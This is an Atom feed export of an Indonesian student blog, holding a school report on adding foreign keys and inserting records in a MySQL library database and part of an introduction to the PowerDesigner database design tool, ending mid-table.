<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8688056575447479178</id><updated>2024-12-18T19:30:58.496-08:00</updated><category term="widgets"/><category term="tips-trick"/><category term="games"/><category term="photoshop"/><category term="hacking"/><category term="Download"/><category term="jquery style"/><title type='text'>Captain Kid&#39;s blog</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default?start-index=26&amp;max-results=25'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>64</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-111113736507118143</id><published>2015-09-17T09:29:00.000-07:00</published><updated>2015-09-27T08:18:12.635-07:00</updated><title type='text'>Laporan Tugas Sekolah SMKN 1 Surabaya</title><content type='html'>Laporan pembuatan database perpustakaan.&lt;br /&gt;
&lt;br /&gt;
laporan kali ini bertujuan untuk menambahkan foreign key dan insert record dalam database.&lt;br /&gt;
&lt;br /&gt;
1. Pengertian Foreign key&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: black; color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;Foreign Key adalah kolom atau field pada suatu tabel yang berfungsi sebagai kunci tamu dari tabel lain. Foreign Key sangat berguna bila kita bekerja dengan banyak tabel yang saling berelasi satu sama lain.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: black; color: white; font-size: 14px; line-height: 20px;&quot;&gt;contoh memberi foreign key pada database mysql lewat cmd :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: black; color: white; font-size: 14px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: black; color: white; font-size: 14px; line-height: 20px;&quot;&gt;ALTER TABLE&amp;nbsp;&amp;lt;nama_tabel&amp;gt;&amp;nbsp;ADD FOREIGN KEY (&amp;lt;field&amp;gt;) REFERENCES &amp;lt;nama_tabel_referensi&amp;gt; (&amp;lt;nama_field_referensi&amp;gt;) ;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;2. Menambahkan record kedalam database :&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;&lt;code class=&quot;sql keyword&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;INSERT&lt;/code&gt;&lt;span style=&quot;font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace; font-size: 15px; line-height: 16.5px; text-align: left; white-space: pre;&quot;&gt; &lt;/span&gt;&lt;code class=&quot;sql keyword&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;INTO&lt;/code&gt;&lt;span style=&quot;font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace; font-size: 15px; line-height: 16.5px; text-align: left; white-space: pre;&quot;&gt; &lt;/span&gt;&lt;code class=&quot;sql plain&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;nama_tabel &lt;/code&gt;&lt;code class=&quot;sql keyword&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;VALUES&lt;/code&gt;&lt;span style=&quot;font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace; font-size: 15px; line-height: 16.5px; text-align: left; white-space: pre;&quot;&gt; &lt;/span&gt;&lt;code class=&quot;sql plain&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;(nilai_kolom1, nilai_kolom2,...);&lt;/code&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code class=&quot;sql plain&quot; style=&quot;-webkit-box-shadow: none !important; background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; font-stretch: inherit; height: auto !important; left: auto !important; line-height: 16.5px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; white-space: pre; width: auto !important;&quot;&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: Consolas, Bitstream Vera Sans Mono, Courier New, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 15px; line-height: 16.5px; white-space: pre;&quot;&gt;hasil ss :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-wr8q9QqfkQzEVB9VJ3DflbULwGI6-wJbPHmBc-PIqBFtvVnlk42Wruy7FlZeIqrRUwEbT43jVJIoP1GTVpQsAlFejBhj6il3jeM_nyZFpJAiYEUy5ysBLJLKEAilxVI0cs0xO09q3k/s1600/satu.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;175&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-wr8q9QqfkQzEVB9VJ3DflbULwGI6-wJbPHmBc-PIqBFtvVnlk42Wruy7FlZeIqrRUwEbT43jVJIoP1GTVpQsAlFejBhj6il3jeM_nyZFpJAiYEUy5ysBLJLKEAilxVI0cs0xO09q3k/s320/satu.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtS7ZZbvB7nU_6cYkvdkVUAk_YYJF-ScE410sRmTnV3EwoS7FL-KUs6PM0ikMXjWJ2Rycu6NHaVeFX-FeVhmxPDwPbG4-6lsnTFLEL1xubud7JYu53f86a7xLFd9iJLMCKVHj4Ceh9VFk/s1600/kedua.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;175&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtS7ZZbvB7nU_6cYkvdkVUAk_YYJF-ScE410sRmTnV3EwoS7FL-KUs6PM0ikMXjWJ2Rycu6NHaVeFX-FeVhmxPDwPbG4-6lsnTFLEL1xubud7JYu53f86a7xLFd9iJLMCKVHj4Ceh9VFk/s320/kedua.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGqtF53pwsnq4MpsdAQhd0eIBbsGOL7Wrzl2Tvopxzhc7FNtiNCBDAIY-9FnQWJmqL6uxZgSoQVggGopDK0V458ur5f1iB0SdDUAvyQcYYg2do3GGKmRYyilJoE1CNHrHfkIaD87jPb28/s1600/ketiga.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;174&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGqtF53pwsnq4MpsdAQhd0eIBbsGOL7Wrzl2Tvopxzhc7FNtiNCBDAIY-9FnQWJmqL6uxZgSoQVggGopDK0V458ur5f1iB0SdDUAvyQcYYg2do3GGKmRYyilJoE1CNHrHfkIaD87jPb28/s320/ketiga.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqc__DNJzVqIkuDV46buhuK5cxb_giCtAmYJgqMX3szLA-MVCPiwF-bLX7C0R1afIJ8TRw9SE-769ijcnh28CZyC-fWse0UXtCj-ZOokfk_tcr5ZMzq_AC_KD9YYJePk52fp_-btOmT5A/s1600/keempat.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;174&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqc__DNJzVqIkuDV46buhuK5cxb_giCtAmYJgqMX3szLA-MVCPiwF-bLX7C0R1afIJ8TRw9SE-769ijcnh28CZyC-fWse0UXtCj-ZOokfk_tcr5ZMzq_AC_KD9YYJePk52fp_-btOmT5A/s320/keempat.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnvbTne69ZHZfjtVOtpcw_u_bcEHW2cM_NbFfqsTNSYw5cu_ve053RbKuvIJTLbjoy783qegWOSy_EN0sTxXEkKgOmuwbq1JnHLe9WIPLLWCA_UfHOuNK6PXcoRO3cvjiWISGAVwvm8Yc/s1600/kelimax.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;164&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnvbTne69ZHZfjtVOtpcw_u_bcEHW2cM_NbFfqsTNSYw5cu_ve053RbKuvIJTLbjoy783qegWOSy_EN0sTxXEkKgOmuwbq1JnHLe9WIPLLWCA_UfHOuNK6PXcoRO3cvjiWISGAVwvm8Yc/s320/kelimax.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Kesimpulan :&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Foreign key berguna bila bekerja dengan banyak tabel yang berelasi satu sama lain.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Sekian Laporan nya ya...&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
malam malam jadi ngantuk :3 nantikan laporan laporan berikutnya hanya di &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;abrian-pamungkaz.blogspot.com&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: Consolas, Bitstream Vera Sans Mono, Courier New, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 15px; line-height: 16.5px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/111113736507118143/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2015/09/blablabla.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/111113736507118143'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/111113736507118143'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2015/09/blablabla.html' title='Laporan Tugas Sekolah SMKN 1 Surabaya'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-wr8q9QqfkQzEVB9VJ3DflbULwGI6-wJbPHmBc-PIqBFtvVnlk42Wruy7FlZeIqrRUwEbT43jVJIoP1GTVpQsAlFejBhj6il3jeM_nyZFpJAiYEUy5ysBLJLKEAilxVI0cs0xO09q3k/s72-c/satu.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-1433500194415648551</id><published>2015-08-20T08:35:00.004-07:00</published><updated>2015-08-20T22:57:12.289-07:00</updated><title type='text'>Pengertian Power Desain</title><content type='html'>&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Assalamu&#39;alaikum ..&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; oke gan kali ini ane bakal ngepost tentang pengenalan tentang software database yaitu power designer, oke langsung aja cekidot ...&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Power designer 6.0 32 bit adalah sebuah paket program desain tools yang digunakan untuk membuat Visualisasi, dokumentasi dan mendesain suatu sistem perangkat lunak. Paket ini meliputi&amp;nbsp; :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ol start=&quot;1&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;1&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Process analyst Model (PAM)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Data architect tools&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Aplication modeler tools&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Metawork tools&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;img src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiclUh3F2N48ChZNOEPYw3fvPhNvcjjQBTT6zPjD6hxGU0iPjsQIi1IesjUKKAvNGA7O8VgzFBjKJFeqGjY3fAPTHoDnnqEMfYhU2G1dMuUXFp8VJSzXTGabdElwnQ2u1n75TdC6lo70msm/s400/power-design++6.jpg&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: none; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;A. Process Analyst Model&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Process analyst adalah suatu&amp;nbsp;&lt;i&gt;Powerdesigner tool&lt;/i&gt;&amp;nbsp;yang memungkinkan untuk menggambarkan aliran informasi dari suatu proses di dalam sistem informasi. Suatu PAM menunjukkan bagaimana data diubah dan menunjukkan proses fungsional yang berlaku untuk data itu.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Produk ini adalah merupakan suatu alat (tools) yang dapat digunakan untuk membuat pemodelan aliran informasi suatu sistem perangkat. Dengan menggunakan produk software ini diharapkan dapat :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Membangun model fungsional ( OMT) dan diagram arus data&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menggunakan lambang sesuai dengan berbagai metoda didukung: OMT, Yourdon/Demarco, Gane&amp;amp; Sarson, dan SSADM&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menciptakan suatu hirarki proses&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Customize dan mencetak laporan model&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menggunakan data item dari suatu Data Konseptual Model ( CDM)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menggunakan OLE teknologi untuk menghubungkan rancangan model &amp;nbsp;ke aplikasi lain&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Suatu PAM memungkinkan untuk:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Meneliti proses dari suatu sistem&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Menghadirkan proses ini dalam wujud suatu model&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Menciptakan suatu struktur pohon hirarkis [yang] mewakili proses ini&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Suatu PAM menggambarkan interaksi dari beberapa object berikut:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; margin-bottom: 20px; margin-left: 12.5pt; width: 604px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Object&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: center;&quot;&gt;
